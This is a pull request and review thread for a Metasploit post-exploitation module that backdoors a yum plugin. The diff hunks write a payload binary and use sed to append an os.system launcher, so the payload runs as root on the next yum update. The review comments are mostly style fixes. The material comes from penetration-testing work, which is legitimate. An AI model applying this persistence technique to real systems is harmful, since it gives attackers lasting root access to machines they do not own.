### PR TITLE
Addition of yum package manager module and documentation

### PR DESCRIPTION
**Pull request by aringo**
This module will run a payload when the Yum package manager is updated. Module allows for easy modification of a plugin.  Could redo to automatically pick a plugin, but currently set to most popular default plugin.  

## Verification

- [ ] Start `msfconsole`
- [ ] Get a privileged session on a target that uses the Yum package manger 
- [ ] `use exploit/linux/local/yum_package_manager_persistence`
- [ ] Choose a payload and set options 
- [ ] `exploit`
- [ ] **Verify** Fail if plugins are not enabled
- [ ] **Verify** Fail if plugin does not exist, is not enabled
- [ ] **Verify** Wrote plugin , wrote binary
- [ ] **Verify** fail if no permissions to write plugin or binary
- [ ] `use exploit/multi/handler/` 
- [ ] Choose a payload and set options 
- [ ] `run`
- [ ] On target run `sudo yum update`
- [ ] **Verify** Caught a root session
- [ ] **Documentation** Included

### CODE REVIEW

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 1]
```diff
@@ -0,0 +1,130 @@
...
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Dec 17 2003', # Date published, Robert G. Browns documentation on Yum
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
      'DisclosureDate' => '2003-12-17', # Date published, Robert G. Browns documentation on Yum
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 2]
```diff
@@ -0,0 +1,130 @@
...
+        OptString.new('PluginPath', [ true, 'Plugin Path to use', '/usr/lib/yum-plugins/' ])
+      ])
+    end
+
+
+  def exploit
+
+    # checks /usr/lib/yum-plugins/PLUGIN.py exists and is writeable
+    plugin = datastore['PLUGIN']
+    full_plugin_path = datastore['PluginPath'] + plugin + ".py"
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    full_plugin_path = "#{datastore['PluginPath']}#{plugin}.py"
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 3]
```diff
@@ -0,0 +1,130 @@
...
+    print_status("#{full_plugin_path}")
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    print_status(full_plugin_path)
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 4]
```diff
@@ -0,0 +1,130 @@
...
+    unless writable? full_plugin_path
+      fail_with Failure::BadConfig, "#{full_plugin_path} not writable, does not exist, or yum is not on system"
+    end
+
+    # /etc/yum.conf must contain plugins=1 for plugins to run at all
+    plugins_enabled = cmd_exec "grep -F 'plugins=1' /etc/yum.conf"
+    unless plugins_enabled.include? "plugins=1"
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    unless plugins_enabled.include? 'plugins=1'
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 5]
```diff
@@ -0,0 +1,130 @@
...
+      fail_with Failure::NotVulnerable, "Plugins are not set to be enabled in /etc/yum.conf"
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
      fail_with Failure::NotVulnerable, 'Plugins are not set to be enabled in /etc/yum.conf'
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 6]
```diff
@@ -0,0 +1,130 @@
...
+    end
+    print_good("Plugins are enabled!")
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    print_good('Plugins are enabled!')
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 7]
```diff
@@ -0,0 +1,130 @@
...
+
+    # /etc/yum/pluginconf.d/PLUGIN.conf must contain enabled=1
+    plugin_conf = "/etc/yum/pluginconf.d/#{plugin}.conf"
+    plugin_enabled = cmd_exec "grep -F 'enabled=1' #{plugin_conf}"
+    unless plugin_enabled.include? "enabled=1"
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    unless plugin_enabled.include? 'enabled=1'
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 8]
```diff
@@ -0,0 +1,130 @@
...
+      print_bad("#{plugin_conf} plugin is not configured to run")
+      fail_with Failure::NotVulnerable, "try: grep -F 'enabled=1' /etc/yum/pluginconf.d/*"
+    end
+
+    # plugins are made in python and generate pycs on successful execution
+    unless exist? "#{full_plugin_path}c"
+      print_warning("Either Yum has never been executed, or the selected plugin has not run")
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
      print_warning('Either Yum has never been executed, or the selected plugin has not run')
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 9]
```diff
@@ -0,0 +1,130 @@
...
+    backdoor_path = datastore['WritableDir']
+    unless writable? backdoor_path
+      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
+    end
+    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
+    backdoor_path << backdoor_name
+
+    # check that the plugin contains an import os, to backdoor
+    import_os_check = cmd_exec "grep -F 'import os' #{full_plugin_path}"
+    unless import_os_check.include? "import os"
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    unless import_os_check.include? 'import os'
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 10]
```diff
@@ -0,0 +1,130 @@
...
+      fail_with Failure::NotVulnerable, "#{full_plugin_path} does not import os, which is odd"
+    end
+
+    # check for sed binary and then append launcher to plugin underneath
+    print_status("Attempting to modify plugin")
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    print_status('Attempting to modify plugin')
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 11]
```diff
@@ -0,0 +1,130 @@
...
+    launcher = "os.system('setsid #{backdoor_path} 2>/dev/null \\& ')"
+    sed_path = cmd_exec "command -v sed"
+    unless sed_path.include?("sed")
+      fail_with Failure::NotVulnerable, "Module uses sed to modify plugin, sed was not found"
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
      fail_with Failure::NotVulnerable, 'Module uses sed to modify plugin, sed was not found'
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb [hunk 12]
```diff
@@ -0,0 +1,130 @@
...
+      write_file(backdoor_path, generate_payload_exe)
+    end
+    unless exist? backdoor_path
+      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
+    end
+
+    # change perms to reflect bins in /usr/local/bin/, give good feels
+    chmod(backdoor_path, 0755)
+    print_status("Backdoor uploaded to #{backdoor_path}")
+    print_status("Backdoor will run on next Yum update")
```
Comment (jrobles-r7) [inline modules/exploits/linux/local/yum_package_manager_persistence.rb]:
```suggestion
    print_status('Backdoor will run on next Yum update')
```

File: modules/exploits/linux/local/yum_package_manager_persistence.rb (hunk 1 above)
Comment (aringo) [reply modules/exploits/linux/local/yum_package_manager_persistence.rb]: I had seen this comment on the previous module,  is the format changing?

**Comment by aringo** [comment]
Updated based on formatting/rubocop suggestions.

File: modules/exploits/linux/local/yum_package_manager_persistence.rb (hunk 1 above)
Comment (bcoles) [reply modules/exploits/linux/local/yum_package_manager_persistence.rb]: Metasploit was updated a few months ago to support both formats. International standard date format is objectively superior.

**Comment by jrobles-r7** [comment]
## Release Notes

The yum_package_manager_persistence module modifies a specified yum plugin for persistence on the target system.

**Pull request merged**